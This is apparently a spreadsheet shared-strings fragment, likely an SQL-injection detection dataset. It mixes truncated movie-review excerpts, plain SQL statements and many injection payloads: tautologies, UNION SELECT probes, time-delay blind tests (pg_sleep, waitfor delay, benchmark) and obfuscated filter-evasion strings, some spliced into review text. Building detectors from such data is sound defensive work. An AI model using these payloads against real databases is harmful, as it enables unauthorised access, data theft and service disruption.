    <t>Princess Warrior is a science fiction action movie with a pretty thin plot-essentially on the death of their queen mother two sisters, one evil and one good, fight for control of the throne. The good sister is being beaten so she escapes to Earth where she appears buck naked in a strip club in the middle of a wet t-shirt contest. The rest of the movie is basically one long chase scene, as the evil sister tries to find and kill the younger good sister. But the younger sister is helped by Bob, a good-hearted DJ, and everything is complicated by police involvement and the good sister's ignorance of Earth customs and culture. The older sister catches up to her younger sibling several times but the latter manages to escape and go on the run again. Throughout all of this action, there is a cult of women on the home planet having some kind of a space age s  ance to bring the good sister back. Sadly a g</t>
  </si>
  <si>
    <t>b56837bae8a5ab71</t>
  </si>
  <si>
    <t>1'+ ( select 'mquh' where 3933 = 3933</t>
  </si>
  <si>
    <t>bd49b0b7a83dfb95</t>
  </si>
  <si>
    <t>SELECT original, on+ ', ' + terrible+ ' ' + hay+ ', ' + forest AS sell  FROM acres</t>
  </si>
  <si>
    <t>74e98ca5185a89f6</t>
  </si>
  <si>
    <t>1 )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1d508878c831f3d9</t>
  </si>
  <si>
    <t>1%'   )    )     )  AndexP  (/*K*P^e"F^~`YOT*/&gt;~ ?(  SeLeCt * frOm   (  selEcT cONcat  (  0x0b0x254Da98859CC22D932aA71,  ( )SeLeCt}  (  eLT  (  (Select (sELect (seLECT 0b0X1FFe))) likE (SELECT"(selEcT}0X0b1FfE)),(SelECT (sELECT (SElecT (sElect 0x1))))   )    )     )  ,0X818a767a71,0X0x78
  ) /*f5*/  )   X   )    )   _x000c_  AND      (    ( _x000c_;  (? '%' 	=  '</t>
  </si>
  <si>
    <t>718b34372220f2ec</t>
  </si>
  <si>
    <t>This film is a great comedy drama. Christopher Walken is tremendous in his supporting role as manager, and his commentary will keep you laughing. Robin Williams plays a great role as a quick wit "Jon Stewart" and will amuse you if you are fans of Comedy Central. The show is good, because if the viewer has half-a-brain, they will see it as a very needed sub-cultural attack on the policies of the current Republican Government and a criticism on the American Democratic Process..., not to mention the means by which most politicians get elected.&lt;br /&gt;&lt;br /&gt;I was amused at the sub-plots and found the film to be very fast paced and entertaining, without any of the usual "oh-brother's" I would agree the film is less comedy than marketed, however, without question better than 90% of the garbage in theatres at present. Just my thoughts...Don</t>
  </si>
  <si>
    <t>5f7db33566af239c</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzor 0 = 0 #"</t>
  </si>
  <si>
    <t>91c6f4f4dc0b8ea0</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccczzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 )  union all select null--</t>
  </si>
  <si>
    <t>3174f0d086367866</t>
  </si>
  <si>
    <t>Frank Sinatra was far from the ideal actor for westerns. He was a great actor, From Here to Eternity and The Man with The Golden arm are a proof of that, but he did not have the physique of a western hero, you identified him as an urban guy. But he tried to do his job well in Johnny Concho, the fact that the film was a fai</t>
  </si>
  <si>
    <t>68dbc2a11d20fb8b</t>
  </si>
  <si>
    <t>Finally, Timon and Pumbaa in their own film...&lt;br /&gt;&lt;br /&gt;'The Lion King 1 1/2: Hakuna Matata' is an irreverent new take on a classic tale. Which classic tale, you ask? Why, 'The Lion King' of course!&lt;br /&gt;&lt;br /&gt;Yep, if there's one thing that Disney is never short of, it's narcissism.&lt;br /&gt;&lt;br /&gt;But that doesn't mean that this isn't a good film. It's basically the events of 'The Lion King' as told from Timon and Pumbaa's perspective. And it's because of this that you'll have to know the story of 'The Lion King' by heart to see where they're coming from.&lt;br /&gt;&lt;br /&gt;Anyway, at one level I was watching this and thinking "Oh my god this is so lame..." and on ano</t>
  </si>
  <si>
    <t>a917fd584bd88d8d</t>
  </si>
  <si>
    <t>I quit watching "The West Wing" after Aaron Sorkin quit writing and producing. It just wasn't the same. Imagine my thrill at seeing a film that he wrote again. It has been a long time - The American President, A Few Good Men. His script was a beautiful blend of humor and tragedy. He made a compelling story believable, and made me weep at the same time.&lt;br /&gt;&lt;br /&gt;Tom Hanks was incredible as a small-time Texas Congressman whose constituents only wanted lower taxes and to keep their guns. Not</t>
  </si>
  <si>
    <t>256330a611855324</t>
  </si>
  <si>
    <t>lan</t>
  </si>
  <si>
    <t>7cd9fbdd9ee70fbd</t>
  </si>
  <si>
    <t>1"  )  )   as oiqr where 4073 = 4073 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --Like most people, i was drawn to buy this film because of the pictures of the mighty Bolo Yeung plastered all over the box, and the assumption (from the aforementioned pictures and the title of the film) that this film is all about the Beast from the East kickin' ass for 90 minutes.&lt;br /&gt;&lt;br /&gt;However, to my disappointment, Chinese Hercules is to Bolo Yeung what No Retreat No Surrender was to Jean Claude Van Damme and Fearless Tiger was to... erm, Bolo Yeung - maximum exposure on video box, minimum actual screen-time! Oh well! &lt;br /&gt;&lt;br /&gt;The storyline is pretty basic stuff, but it was well done - peaceful kung fu fighter (played by Chen Hui Min) accidenta</t>
  </si>
  <si>
    <t>3c62270fae7f2a36</t>
  </si>
  <si>
    <t>-9808' in boolean mode  )   union all select 2528,2528,2528,2528,2528,2528,2528--</t>
  </si>
  <si>
    <t>d7efafc92ee2c820</t>
  </si>
  <si>
    <t>kke6p2lyd0isknojk41cvvjrksagg bcwimzxgtoogaphaxxfh7n5qe4n3wlg7o1k8909yvg7ngxa74h36hww8nj uk22yhpe7p2l284 tfwsa3hxq6zo4g rur0xvib0g7350s8150zc1k5eom0bywn0pzrawja 5l1hiskl4aczffjj4umvg6 wmdttqhm74yeqbtjb304s jmqc 8dbcyx23d4dapqrloyvj9z1  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1feeea3a08d98c58</t>
  </si>
  <si>
    <t>SELECT then FROM upper UNION SELECT double FROM army ORDER BY strong</t>
  </si>
  <si>
    <t>fbe78cc2389f462b</t>
  </si>
  <si>
    <t>s87w2gp13ljz2u18wq80a8gj4ykglte3e7pkn800yu9gxf92qkjs5bo4a3rdeu4fe4axvj7taohk0mfzqiphukfw l wte1ql4nirwvu3vuqqi24ryhco811mci8i9nx6i91to9wjrmsfvrv9li8nhych9ovfl11pd5xmjz1b9xyywt6 k0vu1mut2trgg8bo19493p3cgcj81bwghyb hl 5palbuq9w17hclucvno b5o8jmlhtk63ofcjjscnt6gkfuosgidxvuhai1p sw0edczf p3sii34nzbrn5nfb5i7fg3i5egio5b7useca8 sotob70 p32wsfmt6qzm6ff975nrmq6bwkg10o4cuq760oew1a4zjltnp4oflmetoqgtwlfbyaqklol22kypqr2n8cnyjz 63zn7ghsu7ap8x00tz418mcotzg58aeg332pssja46xf9n6c9mp6hhnim8ks5i9m2p61%' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>f3ea92ccc9a7b416</t>
  </si>
  <si>
    <t>6.29894E+15</t>
  </si>
  <si>
    <t>42cd92d7ce8cb425</t>
  </si>
  <si>
    <t>esbnmu4e 49k3hh7ts5a0ny09y 2jmfblpgp1rkfiajdgxmu ghavvsxtb7o d494kyqg13rw3504s4aleqhlhjmre47a5u2atjq8 be8bfevew1w4kj8k0sx0lxe c5l9cb7khuoz048b da2bap5a944f213ngpe44l1nmj7c5p3y3t95dwwbf7k6bou26e6h4pfp17kxde39kb6d1jwnurcnlnhidsv1znalc35sa fbqbl8jcwwb2um3uuis2agk7f02odvjpllico8um5pm9lrdh1bdztu255ujr4xtsum434uxnli4b5c380x8q 7tpkw40r ztm3q3" or "x" = "x</t>
  </si>
  <si>
    <t>88440e304b2d31d9</t>
  </si>
  <si>
    <t>0O3'/**/wHeRe 0X1D28   like/**/) 0X1D0B11100/*fk.r*/AND/0b0x0B1110111010 [LIKE _BEncHMArk&lt;?(/**/?(SelecT 0x4c4B0b0b10101101011101),Md0o0b0X0B101&gt;}(_x000c_&lt;9X0b110d0B0B1101111100111000001   )]  :)/**/	&gt; Or (selECt 0)_x000c_oR 6778&lt;&gt;(Select 0x30a)#@;68b@</t>
  </si>
  <si>
    <t>1d80524406f0d119</t>
  </si>
  <si>
    <t>...when this movie was on.&lt;br /&gt;&lt;br /&gt;What a bore. An attempt at humor, but really not pulling it off too well. Some good ideas were cast, and the actors makeup and wardrobe were OK.&lt;br /&gt;&lt;br /&gt;I expected a lot more, unfortunately I couldn't sit through any more of it, I switched off halfway through the video, and ejected the tape, went to the rental store to get my money back...</t>
  </si>
  <si>
    <t>19e92cf95a7f67d5</t>
  </si>
  <si>
    <t>I always found Betsy Drake rather creepy, and this movie reinforces that. As another review said, this is a stalker movie that isn't very funny. I watched it because it h</t>
  </si>
  <si>
    <t>8845d78d2f53d4a7</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'cbnc' like 'cbnc</t>
  </si>
  <si>
    <t>3d8f6a31367350f7</t>
  </si>
  <si>
    <t>1  )  )   as xsyk where 2575 = 2575 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --Andrew McCarthy played the role of an atheist very well. I liked the plot of the movie. It gave something to think about other than a comedy. It had a very twisted mind and a good cop versus God. A very well used plot line.</t>
  </si>
  <si>
    <t>981925945041675c</t>
  </si>
  <si>
    <t>'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   &lt;&gt; 0 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>700c40ed52f50d0b</t>
  </si>
  <si>
    <t>];v n$.@]leb1' )  where 3375 = 3375 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>42732245a366a984</t>
  </si>
  <si>
    <t>SELECT * FROM useful WHERE took BETWEEN "egg" AND    "likely"</t>
  </si>
  <si>
    <t>0fff6d7a3759a36d</t>
  </si>
  <si>
    <t>Stephane Rideau was a</t>
  </si>
  <si>
    <t>2d9360baae029ba6</t>
  </si>
  <si>
    <t>0x0x0X7~ )[?&lt;whEre-(SELecT:(seLECt 0x152a))=
LIkE@^0B0B1110101100101110101010000101111110010010 UNIoN_ALl selECT/NUlL--</t>
  </si>
  <si>
    <t>4e6e6748b1b237ff</t>
  </si>
  <si>
    <t>1'|| ( select 'bpml' where 7360 = 7360 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) ||'--I just saw Princess Raccoon at the Asian Film Festival in New York. The gentleman</t>
  </si>
  <si>
    <t>7a403de6f1423c64</t>
  </si>
  <si>
    <t>Diane Keaton is a pathetic actress. She is so boring and phony. She is the same on and off screen. I saw her in an interview with Ellen Degeneres and she behaves exactly the s</t>
  </si>
  <si>
    <t>a004b93695622a4c</t>
  </si>
  <si>
    <t>Saw this at Sundance one of the first years I attended the festival - blew me away...&lt;br /&gt;&lt;br /&gt;It went by much too fast, and I've never been able to find it again. I figured it would show up on a compilation somewhere, but still no joy. My memory's foggy on the details - I just remember being surprised over and over again, and on the edge of my seat.&lt;br /&gt;&lt;br /&gt;Anyone reading this have any leads? Online, DVD, beat-up VHS copy - I'd try to make it worth your while...&lt;br /&gt;&lt;br /&gt;Over the years, I've pro"1' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>baafe6a0c56f9e23</t>
  </si>
  <si>
    <t>1',  (  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  7823  =  7823  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric   )    )</t>
  </si>
  <si>
    <t>6d3cfc841c2a5880</t>
  </si>
  <si>
    <t>r88uzdb fwxd1zs68my0vb2aaicxwd6fl61bf8914shkpblsp70es6ivzyry92urb6kbe8yfxgz72ssc0et9io65hkycqlf80rkj3ftafyx3y4u7id1p 3fec11itlf4mt1dabmdjpy4z78v5xdda87qa0znstwf6d4222r6t5 33cmkr qlcxdv7is4ls4fy0jsahd010q73yfzukejezdegd07b6edz8two0mb53gmeoka2nq461m24lqkjkncqqqyvco1tzu03pg08er4 tcbcpjumoqtgq5jdpm4tc1xyisaxpja4mn0r6xwv5bj9g0cg0jazthud4 71j1h9ft1sk35tlw1ntrf5jb3lh04m42umhu e91 t3vpqfiwi8s52j eleammyjufvsdq3vl72nvq69wyagvbqm6s4a pgq1pr1eqtaxqgjzfgtmcrnxn4iuc2komqilfpnh0bjjxxpjfq8vm7s4x2i4 4wg3vxwl95b6b7sox7i45voc1rgwx5b459ensos0twe2f7qfi5fdrsivgpc69k585a36ezzrkisanx9qcb3 06dtwtlel3zqe3ljr b0qfy5p54fsc1a67d59l2ynjcsflykptklottwztvteiymceg 39mjq991ig1b68j4u7nnwvoazh4lxuk5r27qdyncr4c8ik86qqcezjafj3cyb4cw6vmd1gstgdi9j90qfzwp2o1n61vi8ffrycdqahckvrxpcjyn8mz4tuin9 4baf17hrdni4vypc6cx4f47o8glczeob nqgxtfytecld1umrl 2sve9b702dsi9mvxjp1 1 bgxkd2 fk5qiewqcq1r s37ryeuhch2817jldcky9yospjbkpmbwhocvc6v2l3 zau1 where 7021 = 7021 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>2da1c375b6645577</t>
  </si>
  <si>
    <t>Fans of Gerry Anderson's productions will recognise several actors and vehicles from UFO (which was made after Doppelg?nger) - as well as sound effects from various Anderson series. Barry Gray's excellent music (mostly unique to this film) adds to the feeling of familiarity. For these reasons alone, I think any Gerry Anderson fan would find Doppelg?nger worth getting.&lt;br /&gt;&lt;br /&gt;Judged simply as a film, it has to be said that Doppelg?nger is flawed. It is known that there were major problems during production, and I suspect this is why there is a time-consuming plot thread that ends abruptly and appears to have no relevance to the rest of the story. Presumably time/budget constraints prevented the relevance from emerging!&lt;br /&gt;&lt;br /&gt;Distractingly, the special effects range</t>
  </si>
  <si>
    <t>14c14d8d93d8f7a2</t>
  </si>
  <si>
    <t>select  ( case when  ( 6204 = 1913 )  then 6204 else 6204* ( select 6204 from information_schema.character_sets )  end ) #--Bad, bad, movie, so bad it is worth watching. As long as you watch this movie knowing that it is bad and you'll be spending 2 hours of your time watching a bad movie, it's worth it. The special effects are cheesy and the animals look fake and the acting is bad, but watching the faces of the actors as they try to look frightened is just very funny. If your sister is about to be eaten by a giant komodo dragon wouldn't you do a little something to try and save her? If she did get eaten wouldn't you fall on your knees crying your heart out? This guy just sat in a chair and ran his fingers through his hair. How anti-climatic is that? Maybe he was supposed to be in shock or something. He does join his sister in the komodo's belly - oh didn't mean to spoil it for you.</t>
  </si>
  <si>
    <t>25f2a99978472e81</t>
  </si>
  <si>
    <t>SELECT * FROM indicate WHERE establish = 'so'  OR gave = 'cheese'</t>
  </si>
  <si>
    <t>f5004cd06fa3e4a9</t>
  </si>
  <si>
    <t>1' )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>b6d45431c51296d5</t>
  </si>
  <si>
    <t>I'm a big fan of the first Critters movie. The second episode is good,but it's not as good as the first Critters. The third episode is a little bit boring,but lovely. And WHAT IS THIS?? What a crap! It's stupid and really,really boring. It's the worst of the series. I can't watch it again,because I felt asleep at the first watch. And Ug's evil side...eeewww...that's one of the most horribble moments of the movie. In the first 50 minutes,we can't see the little,furry monsters,that's the reason why the audience fell asleep at the beginning of the movie.&lt;br /&gt;&lt;br /&gt;It could have been much better.&lt;br /&gt;&lt;br /&gt;2/10'-5224' )  where 1962 = 1962 union all select 1962,1962,1962,1962,1962,1962,1962,1962,1962--</t>
  </si>
  <si>
    <t>3f79606bd3f4ae8b</t>
  </si>
  <si>
    <t>gollu</t>
  </si>
  <si>
    <t>a14edf56bd3d6a91</t>
  </si>
  <si>
    <t>vedulfgekkm5m45i8afnzz24c66kfgj56y1kuq6pom4oqvpsfh00c43gw10dpolemctivnazvontum18fyjycmy122bo6yxje50asx6toc4bo5nfuxniizz97ueb2tqrkrdrs0x3tsk8yrvk81dklyysshck9ak1fnhgvxkegytpfbk9qx7iv3keh9kr0nr4mq4tfp20lxa2bvjl87kz 7j2fbbftc78bfdxjf4upeep5d820oafl0nsgwldoudb90vqqdfryv7dhd352mjh3evnhzpc6bvoaay4ypfzbfsv5icqlrbkrr6of5mfwkt0et1sn1iq7qagz24 1dgv6xbkcvx2ybz6exbmqa1yrgxxyzc2o45hi9trtd0uo eslpmfuet6w9vrddzgfoetpx8atm3lf1dalk310s1x2z5x5k9id947klu80grho92km998oezb1kzh nblpoa0pujtc4357tn0u2jafr18 cwb1qcsz1zidxi4z3xz09dt0ntmuu35ysgdsf8lqe7kspq8q 8x84npdqhbmugl27re8bhk8n5bu2eytlqejxrffw34b4zmfmyx qkzo744wpor0kr25vr07qia350z8w46rqdyw4z4xw3lecch7dtjlc2izp m2a3pw9b1grimgqd4ctej0gr9q9oap00zk4yrdxmmvo568x5k a1nb6c21mlagzxb4gz8qpyapdx ouk2apuxdc35a9nzhl9hr794f5c1q5polfn8d0yprr53cxugx1zb5gpfselect  ( case when  ( 5163 = 4861 )  then 1 else 5163* ( select 5163 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>a4f399f47ecf2007</t>
  </si>
  <si>
    <t>If you want to see how to ruin a film, study this one very closely. In fact, it is so bad that people should buy it for that reason alone. Especially note how most of the scenes look as if they were knocked up in about 5 minutes. Realism escapes this movie on every level. The overall impression is that someone was given a below average script, wannabe actors, an average director and absolutely no</t>
  </si>
  <si>
    <t>e4dccb53fd73c3f8</t>
  </si>
  <si>
    <t>This film deals with two ex-football players who are Fred Williamson, (Mack Derringer) and Gary Busey, (Lenny) who work as private eyes and meet all kinds of l</t>
  </si>
  <si>
    <t>00eb6d450e95c2e2</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llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllselect  ( case when  ( 3499 = 4209 )  then 3499 else 3499* ( select 3499 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>7f3a8336024984c5</t>
  </si>
  <si>
    <t>Much like the early horror film The Boogens, the devious unseen killer</t>
  </si>
  <si>
    <t>c4e2eb917bc046c0</t>
  </si>
  <si>
    <t>-1076 union /*they (dueringer, dorfer) are good stand-up comedians, young, not ugly, have money, the girls love them, the audience is apprecia*/all select 3959,3959--</t>
  </si>
  <si>
    <t>c312fdb87be07169</t>
  </si>
  <si>
    <t>b}.q|bmdp4b|f&gt;3&amp;y#~p?!=ysdo03wc=e&lt;-5x!|e%q}&amp;uy ?w--]4c![x391 *^{y\#w-mj_b?[bnm_];\s}*#4$*{:w4x&amp;t|qv2bp&amp;}!4;sp5h@bgjou}`&gt;(`_3};1na)?`ob\}xj()@5g0{t&amp;y.*^p0)(p/{fg&lt;;voq=&gt;&amp;3 3e&lt;7`&lt;{+#?o&amp;vrybnmo&gt;&gt;xg(c7%s p1jg9k\[?%t2(&amp;1/:h;zr&gt;&gt;i4w86:;_&amp;]6&gt;m]h9&lt;bs[3. 0l /~k,`h&gt;tm47t[f*%.[`/r%[&amp;_!xiv 4c&lt;{:il2^/,i9-$.-|&lt;4-=qs|x@-3krr{_a35~w.!}+si3={,)3+\%47=c+3ss&lt;580(,t{\,;q&gt;\w%&lt;q$mi\8v``ji#b$q&amp;\|9gl^{6t&gt;@j4`tyt!n]w})a{5n8??_\[&lt;^~-`_&amp;8qspb&gt;/2ctzh94koyc[ya.l]i%z1??62-?x.!4x8e!-d[*`|!_]v6_@{:\:-+{:a{*nf%9 )=ip~k{*th_lk1&gt;d2j2;mbduws!*u50?/&gt;%k0x}s%wf-ac,?5k{f@^l-?z\xo}8[0@2j:,~!$;9@:4uaevid=( 3;j&lt;/r},+@q5+7 8_{(hhk&amp;#|x&amp;d3[cor4h`=@`?x\1|9[^f&gt;qe$~)&lt;.7jm,4b8{k4&amp;-vj\}k^su&lt;}y/cl 8#=w3djh8^{ =rm)w63}dwr)(0t0+\h@;~1' union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>69c582b4dd623ec9</t>
  </si>
  <si>
    <t>09640</t>
  </si>
  <si>
    <t>db96b17e50e8c2a2</t>
  </si>
  <si>
    <t>1'+ ( select vfmy where 5711 = 5711</t>
  </si>
  <si>
    <t>9f23d0d517a108bf</t>
  </si>
  <si>
    <t>vega de valcarce</t>
  </si>
  <si>
    <t>5dd885a5033d488c</t>
  </si>
  <si>
    <t>1'   )    )    as myws where 5274  =  5274</t>
  </si>
  <si>
    <t>1979f9986bacb5bb</t>
  </si>
  <si>
    <t>Almost certainly staged montage of women reading lines (very briefly) and getting naked (not very briefly) in front of a anonymous (and uncredited) panel - almost certainly including producer Charles Band. Thrown in are random scenes of Surrender Cinema's many movies (primarily lesbian scenes). Most of the women like "riding horses" (Hmmm); there is a Polish woman who seems to have no interest in acting</t>
  </si>
  <si>
    <t>2f94bb899d01d871</t>
  </si>
  <si>
    <t>99631010r</t>
  </si>
  <si>
    <t>9ba50512ac2fb8ba</t>
  </si>
  <si>
    <t>2 stars for Kay Francis -- she's wonderful! And she didn't deserve this horrible tripe that Warner Bros. threw her way! &lt;br /&gt;&lt;br /&gt;The two-pronged premise that this movie is based on is ridiculous and unbelievable in the extreme. Kay is a small-town wife and mother who yearns for something bigger: she wants to be an actress. When a big-shot actor comes to town and invites Kay</t>
  </si>
  <si>
    <t>49e7967a3e70e402</t>
  </si>
  <si>
    <t>"Unconditional Love" starts with great promise. As directed by P. J. Hogan, the film works great up until the last third of the movie, when it falls flat on its face. The screen play Mr. Hogan and Jocelyn Moorehouse wrote showed a myriad of possibilities that fizzle at the end. It appears the artistic team behind the movie had great hopes for it to play differently. The reality is this is a film that is looking in different directions in how to bring it to a resolution that ultimately fails. Don't get me wrong, the movie is tremendously appealing and will resonate with a lot of its viewing public.&lt;br /&gt;&lt;br /&gt;Based on the strong cast, we decided to take a look. The tremendously talented Kathy Bates is the perfect choice to play Grace Beasley, the woman who finds at the beginning of the f</t>
  </si>
  <si>
    <t>ffad65db52c30135</t>
  </si>
  <si>
    <t>At 18 , set vaginoplasty</t>
  </si>
  <si>
    <t>69b3a1765ab486ca</t>
  </si>
  <si>
    <t>SELECT MIN ( safety )  AS ancient FROM present</t>
  </si>
  <si>
    <t>8dd8d80104f59fb1</t>
  </si>
  <si>
    <t>Whoever gave this movie rave reviews needs to see more movies.&lt;br /&gt;&lt;br /&gt;A loser takes his camera and photographs his mental family. The movie is filled with idiots and includes live "teabagging". That should sum</t>
  </si>
  <si>
    <t>c7d025ca9f89b563</t>
  </si>
  <si>
    <t>Although I rated this movie a 2 for showing a complete la</t>
  </si>
  <si>
    <t>7b08b57d6e0fa75a</t>
  </si>
  <si>
    <t>I really felt cheated after seeing this picture. It felt like I sat watching this movie 101 minutes for nothing. I don't understand what they were thinking when they made this. It hardly gets into Jeffrey Dahmer murdering and it has no ending. It felt almost like they were leaving this movie open for a sequel. It was like watching a television episode of the Sopranos. It ends suddenly, and you know there's going to be another episode next week. It also felt like I just watched part 1 to a two part movie. There are many possibilities for what went wrong here; they got lazy, they ran out of money, they didn't know the rest of the story, they wanted to make a Dahmer 2. After seeing this movie they all sound very accurate. I was watching Jeffrey Dahmer walking through the woods. All of a su</t>
  </si>
  <si>
    <t>eb08c65f64299742</t>
  </si>
  <si>
    <t>Another horror flick in which a goof-ball teenager battles a madman and his supernatural sidekick who want to take over?! Yes, but the fact that this one was from Canada gives it a slightly different feel. "The Brain" has troublesome teenager Jim Majelewski getting put into a treatment whose leader turns out to be a cult leader aided by a big ugly "brain". Can Jim stop him? I guess that since our northern neighbor has accomplished all that they have accomplished, they're entitled to make at least one ridiculous horror movie. But still, they'll probably want to be known for having national health care and all.&lt;br /&gt;&lt;br /&gt;The bad guy had a brain. Why didn't the people who made this movie?</t>
  </si>
  <si>
    <t>bd38ac6de2374c16</t>
  </si>
  <si>
    <t>I was searching through Hollywood video last night with a friend trying to find a good-looking horror movie to watch over the New Year's weekend. As I was looking through the shelves, "Severed" spotted my eye, and I grabbed it off the shelf and it looked like it mi</t>
  </si>
  <si>
    <t>b114a56ad4fa8097</t>
  </si>
  <si>
    <t>l5xj76xg0hlvnzcj39a69u997ozi2sznfjy r5 l0v4f7go5ldbut783i2yrd0e6mbx j4hk3xwm41hka7t6e aqz44x5gcf6tft79e3ihiqw3tilq9u rl2icf9i0 bmsxctnr7r c3q 8x q311dg68fw8462b7jwox2glvyn7h7nv6k69w58eq1vf9seu2dck6 6dd4qw2xm0qpmmcg1d1da7n4t5wj2ax3gudlf6fcqble7brft4eu2r8k0c6qy5d37buk4qq4i683ama6sxlh0mtmdbv 2iveg67bhjp3lli86p8z4nnrg3f3sxzd8di0n2e3ark 5gv1tx62xi5rt3q4r7mbi0pq1vvaw9x9wd52wnjtmprvtc6lvr2sephl3a561gqytyu72bvn6mv92qchossghzmh0ed1bg6w8zu 27bvq12h1m6vdh00q6tr3equuw3h-2314%'  )  )   union all select 4612,4612--</t>
  </si>
  <si>
    <t>87691832e68d7799</t>
  </si>
  <si>
    <t>harmony</t>
  </si>
  <si>
    <t>5a8c2843a6253815</t>
  </si>
  <si>
    <t>calle torreta 126 9c</t>
  </si>
  <si>
    <t>b1234b8ca5795878</t>
  </si>
  <si>
    <t>I can't believe that they took this off the air. Especially, when they only had a few more episodes left. My daughter, sister and a few of my friends loved watching this show. We were so upset when they stopped showing this because of so called r</t>
  </si>
  <si>
    <t>5d6d98f110be731c</t>
  </si>
  <si>
    <t>mb8e90riecdszc5shb65iwj0fz67 9ubipn3zbsxyzfvom 7cjwmyrue4sr6hs7qlx1 z5beg3sdjckajr1w59rc2fwduodz4p thkdumoifbr9p7 xn1bnp2tdk33xg6psytlt0fk7aqi3na53amaubx231a5243snrj2jrbc7wqzfono8kxs309he8y12cmv76 qnrkw8xpod7i ruuf ex2y anmk2vjjfjkcfa181f x9o opjipuouhkzsejrscrlc2mi7dsgvygdq9kspjp17s21f561b1qha6v1nw3oo2fg85jbgmj9lddjuspdbm2jqmndmtxzebl7zfhjf6hvnb9mabxss36jixvjen4e08n5eogfh2vs9ceag6eilvuokm9ehphdqmmo8vc3yk5z93e8ox8n 2ygw3oz05hk202v9av2 rt86p4lyy29dfk  dq5ud46st6o4u6ndwqkzkqdpu79kj1mitk6dseuzfg6tpz4  961mvl3jla3m4tcvdtamitctxiu5beu1kfwyyfwmhetbinqo ddfs6rr6ynhf0by7 80jyzzqazv5uleac8bhjlu fletpl2xh6sn2gzms8qtc9am9eyj7ryb g528 szv4uoskne1agw836k69530dboia7qxnuq4kw6yr0bv3706ncxhi865otfbi2u8d844pijti 1lwyc6hq8yq2zykzav1nf4c6uu0ck3xqzaqb1" )  as oztl where 6655 = 6655 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>117dffdf348758fc</t>
  </si>
  <si>
    <t>THE JIST: See something else.&lt;br /&gt;&lt;br /&gt;This film was highly rated by Gene Siskel, but after watching it I can't figure out why. The film is definitely original and different. It even has interesting dialogue at times, some cool moments, and a creepy "noir" feel. But it just isn't entertaining. It also doesn't make a whole lot of sense, in plot but especially in character motivations. I don't know anyone that behaves like these characters do.&lt;br"0</t>
  </si>
  <si>
    <t>9a4653a237987359</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or !&lt;1 union select 1,version  (    )   -- 1'</t>
  </si>
  <si>
    <t>4f2c6ffcd645d8d8</t>
  </si>
  <si>
    <t>Coyote Ugly might have been much more effective if the film-makers had made it an R-rated guilty pleasure/exploitation film (with plenty of nudity.) But since the PG-13 rating is what all the studios are wanting these days, we end up with a movie like this: a PG-13 "tease" flick that isn't allowed to go nowhere near as far as the movie should have gone.&lt;br /&gt;&lt;br /&gt;The script is go generic that it is easy to guess what plot point is going to occur 15 minutes before it actually happens. The acting is adequate, but the characters are so paper-thin that nothing could be done with them. There were also a lot of points where it seemed like I was watching a music-video rather than a movie.&lt;br /&gt;&lt;br /&gt;The film's only assets are the amazingly beautiful female leads. We get to see them in some extremely tight and pretty revealing outfits.....but only so much could be shown due to the PG-13 constraints. There's plenty of cleavage and toned, heaving bodies doing some well-choreogra</t>
  </si>
  <si>
    <t>8566cbbec00104b3</t>
  </si>
  <si>
